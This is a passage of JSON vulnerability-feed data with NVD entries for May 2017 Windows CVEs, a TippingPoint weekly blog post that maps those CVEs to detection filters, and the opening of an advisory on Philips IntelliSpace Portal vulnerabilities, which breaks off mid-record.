"2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:55", "description": "Windows DNS Server allows a denial of service vulnerability when Microsoft Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 Gold and R2, and Windows Server 2016 are configured to answer version queries, aka \"Windows DNS Server Denial of Service Vulnerability\".", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0171", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0171"], "modified": "2017-05-25T15:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0171", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0171", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:05", "description": "The kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1 and Windows Server 2012 Gold allow a local authenticated attacker to execute a specially crafted application to obtain kernel information, aka \"Win32k Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0245", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0245"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0245", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:01", "description": "An information disclosure vulnerability exists in the way some ActiveX objects are instantiated, aka \"Microsoft ActiveX Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0242", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0242"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:03", "description": "The kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows locally authenticated attackers to gain privileges via a crafted application, or in Windows 7 for x64-based systems, cause denial of service, aka \"Windows Kernel Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0244", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0244", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:13", "description": "The GDI component in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka \"GDI Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0190", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0190"], "modified": "2017-07-08T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0190", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:18", "description": "The kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow a local authenticated attacker to execute a specially crafted application to obtain information, or in Windows 7 and later, cause denial of service, aka \"Win32k Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0077", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0077", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0077", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "trendmicroblog": [{"lastseen": "2017-05-18T08:47:17", "description": "![](http://blog.trendmicro.com/wp-content/uploads/2016/04/TP-WeeklyBlog-300x205-300x205.jpg)\n\nAlthough I\u2019m still dreaming of the sandy beaches of Cancun, it\u2019s time to get back to reality. Security vulnerabilities never take a holiday and this week is no exception. In addition to our normal Digital Vaccine (DV) package delivered earlier this week, we also issued an out-of-band DV package to address zero-day vulnerabilities for Intel Active Management Technology (AMT) ([CVE-2017-5689](<https://nvd.nist.gov/vuln/detail/CVE-2017-5689>)) and Windows Defender ([CVE-2017-0290](<https://nvd.nist.gov/vuln/detail/CVE-2017-0290>)).\n\nThe Intel AMT vulnerability is an escalation of privilege vulnerability that allows an unprivileged attacker to gain control of the manageability features provided by the affected Intel AMT products. The Windows Defender vulnerability is much scarier because allows a remote attacker to take over a system without any interaction from the system owner. Just the mere execution of Windows Defender scanning an email or instant message from an attacker is enough. But don\u2019t worry \u2013 customers using TippingPoint solutions are protected from these vulnerabilities with the following DV filters:\n\n| \n\n * 28214: HTTP: Null response digest\n * 28221: HTTP: Microsoft Malware Protection Engine mpengine Type Confusion Vulnerability \n---|--- \n| \n \n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before May 9, 2017. Microsoft released patches for 55 new CVEs in Internet Explorer, Edge, Office, Windows, and .NET Framework. A total of 14 of these CVEs are rated Critical while the rest are rated Important in severity. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an (*) shipped prior to this DV package, providing zero-day protection for our customers. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/5/5/the-may-2017-security-update-review>):\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0064 | | Insufficient Vendor Information \nCVE-2017-0077 | 28112 | \nCVE-2017-0171 | | Insufficient Vendor Information \nCVE-2017-0175 | 28183 | \nCVE-2017-0190 | | Insufficient Vendor Information \nCVE-2017-0212 | | Insufficient Vendor Information \nCVE-2017-0213 | 28184 | \nCVE-2017-0214 | 28189 | \nCVE-2017-0220 | 28198 | \nCVE-2017-0221 | 28114 | \nCVE-2017-0222 | | Insufficient Vendor Information \nCVE-2017-0224 | | Insufficient Vendor Information \nCVE-2017-0226 | | Insufficient Vendor Information \nCVE-2017-0227 | 28130 | \nCVE-2017-0228 | *27538 | \nCVE-2017-0229 | | Insufficient Vendor Information \nCVE-2017-0230 | | Insufficient Vendor Information \nCVE-2017-0231 | | Insufficient Vendor Information \nCVE-2017-0233 | | Insufficient Vendor Information \nCVE-2017-0234 | *27532 | \nCVE-2017-0235 | | Insufficient Vendor Information \nCVE-2017-0236 | *27536 | \nCVE-2017-0238 | *27540 | \nCVE-2017-0240 | *27541, *27542 | \nCVE-2017-0241 | | Insufficient Vendor Information \nCVE-2017-0242 | | Insufficient Vendor Information \nCVE-2017-0243 | 28192 | \nCVE-2017-0244 | | Insufficient Vendor Information \nCVE-2017-0245 | 28185 | \nCVE-2017-0246 | 28111 | \nCVE-2017-0248 | | Insufficient Vendor Information \nCVE-2017-0254 | | Insufficient Vendor Information \nCVE-2017-0255 | | Insufficient Vendor Information \nCVE-2017-0258 | 28199 | \nCVE-2017-0259 | 28200 | \nCVE-2017-0261 | | Insufficient Vendor Information \nCVE-2017-0262 | | Insufficient Vendor Information \nCVE-2017-0263 | 28186 | \nCVE-2017-0264 | | Insufficient Vendor Information \nCVE-2017-0265 | | Insufficient Vendor Information \nCVE-2017-0266 | 28193 | \nCVE-2017-0267 | | Insufficient Vendor Information \nCVE-2017-0268 | | Insufficient Vendor Information \nCVE-2017-0269 | | Insufficient Vendor Information \nCVE-2017-0270 | | Insufficient Vendor Information \nCVE-2017-0271 | | Insufficient Vendor Information \nCVE-2017-0272 | | Insufficient Vendor Information \nCVE-2017-0273 | | Insufficient Vendor Information \nCVE-2017-0274 | | Insufficient Vendor Information \nCVE-2017-0275 | | Insufficient Vendor Information \nCVE-2017-0276 | | Insufficient Vendor Information \nCVE-2017-0277 | | Insufficient Vendor Information \nCVE-2017-0278 | | Insufficient Vendor Information \nCVE-2017-0279 | | Insufficient Vendor Information \nCVE-2017-0280 | | Insufficient Vendor Information \nCVE-2017-0281 | | Insufficient Vendor Information \n \n \n\n**Zero-Day Filters**\n\nThere are 14 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n| \n\n * 28094: ZDI-CAN-4564: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28099: ZDI-CAN-4565: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28100: ZDI-CAN-4566: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28101: ZDI-CAN-4567: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28202: ZDI-CAN-4715, 4716: Zero Day Initiative Vulnerability (Adobe Reader DC)**_ _** \n---|--- \n| \n \n**_EMC (6)_**\n\n| \n\n * 28102: ZDI-CAN-4694: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28103: ZDI-CAN-4695: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28104: ZDI-CAN-4696: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28105: ZDI-CAN-4698: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28106: ZDI-CAN-4699: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28107: ZDI-CAN-4710: Zero Day Initiative Vulnerability (EMC AppSync)**_ _** \n---|--- \n| \n \n**_NetGain (3)_**\n\n| \n\n * 28108: ZDI-CAN-4749: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28109: ZDI-CAN-4750: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28110: ZDI-CAN-4751: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)**_ _** \n---|--- \n| \n \n**Updated Existing Zero-Day Filters**\n\nThis section highlights specific filter(s) of interest in this week\u2019s Digital Vaccine package that have been updated as a result of a vendor either issuing a patch for a vulnerability found via the Zero Day Initiative or a vulnerability that has been published by the Zero Day Initiative in accordance with its [Disclosure Policy](<http://zerodayinitiative.com/advisories/disclosure_policy/>).\n\nThree of the filters we have for this month\u2019s Microsoft bulletins are a direct result of the Zero Day Initiative\u2019s Pwn2Own contest held in March. These filters have been updated to reflect the fact that the vulnerabilities have been patched:\n\n| \n\n * 27532: HTTP: Microsoft Edge Chakra JIT Array Memory Corruption Vulnerability (Pwn2Own)\n * 27538: HTTP: Microsoft Edge Chakra Array Splice Use-After-Free Vulnerability (Pwn2Own)\n * 27540: HTTP: Microsoft Edge Chakra Array Unshift Buffer Overflow Vulnerability (Pwn2Own)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-1-2017/>).", "cvss3": {}, "published": "2017-05-12T16:47:57", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 8, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0290", "CVE-2017-0248", "CVE-2017-5689", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0220", "CVE-2017-0224", "CVE-2017-0281", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0254", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0264", "CVE-2017-0077", "CVE-2017-0255", "CVE-2017-0221", "CVE-2017-0243", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0242", "CVE-2017-0262", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0265", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", "CVE-2017-0261", "CVE-2017-0175"], "modified": "2017-05-12T16:47:57", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-8-2017/", "id": "TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2022-04-26T22:14:13", "description": "## OVERVIEW\n\nPhilips reported vulnerabilities in the Philips\u2019 IntelliSpace Portal (ISP), an advanced visualization and image analysis system. Philips is creating a software update to mitigate these vulnerabilities in the affected products. Additionally, they are issuing mitigating controls for some vulnerabilities.\n\nSome vulnerabilities could be exploited remotely.\n\nExploits that target some vulnerabilities are publicly available.\n\n## AFFECTED PRODUCTS\n\nPhilips reports that these vulnerabilities affect the following versions of the ISP:\n\n * IntelliSpace Portal, all 8.0.x versions, and\n * IntelliSpace Portal, all 7.0.x versions.\n\n## IMPACT\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to gain unauthorized access to sensitive information, perform man-in-the-middle attacks, create denial of service conditions, or execute arbitrary code.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment and specific clinical usage.\n\n## BACKGROUND\n\nPhilips is a global company that maintains offices in many countries around the world, including countries in Africa, Asia, Europe, Latin America, the Middle East, and North America.\n\nThe Philips ISP processes clinical images from different modalities and enables advanced visualization of the images. ISP systems are deployed across the Healthcare and Public Health sectors. Philips estimates these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nThe ISP has multiple input validation vulnerabilities that could allow a remote attacker to execute arbitrary code or cause the application to crash.\n\n[CVE-2018-5474](<https://nvd.nist.gov/vuln/detail/CVE-2018-5474>), [CVE-2017-0143](<https://nvd.nist.gov/vuln/detail/CVE-2017-0143>), [CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), [CVE-2017-0146](<https://nvd.nist.gov/vuln/detail/CVE-2017-0146>), [CVE-2017-0148](<https://nvd.nist.gov/vuln/detail/CVE-2017-0148>), [CVE-2017-0272](<https://nvd.nist.gov/vuln/detail/CVE-2017-0272>), [CVE-2017-0277](<https://nvd.nist.gov/vuln/detail/CVE-2017-0277>), [CVE-2017-0278](<https://nvd.nist.gov/vuln/detail/CVE-2017-0278>), [CVE-2017-0279](<https://nvd.nist.gov/vuln/detail/CVE-2017-0279>), [CVE-2017-0269](<https://nvd.nist.gov/vuln/detail/CVE-2017-0269>), [CVE-2017-0273](<https://nvd.nist.gov/vuln/detail/CVE-2017-0273>), and [CVE-2017-0280](<https://nvd.nist.gov/vuln/detail/CVE-2017-0280>) have been assigned to these vulnerabilities. The CVSS v3 base scores for theses vulnerabilities range from 5.9 to 8.1\n\n### [INFORMATION EXPOSURE CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\nThe ISP has multiple information exposure vulnerabilities that could allow an attacker to gain unauthorized access to sensitive information.\n\n[CVE-2017-0147](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147>), [CVE-2017-0267](<https://nvd.nist.gov/vuln/detail/CVE-2017-0267>), [CVE-2017-0268](<https://nvd.nist.gov/vuln/detail/CVE-2017-0268>), [CVE-2017-0270](<https://nvd.nist.gov/vuln/detail/CVE-2017-0270>), [CVE-2017-0271](<https://nvd.nist.gov/vuln/detail/CVE-2017-0271>), [CVE-2017-0274](<https://nvd.nist.gov/vuln/detail/CVE-2017-0274>), [CVE-2017-0275](<https://nvd.nist.gov/vuln/detail/CVE-2017-0275>), and [CVE-2017-0276](<https://nvd.nist.gov/vuln/detail/CVE-2017-0276>), have been assigned to these vulnerabilities. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is 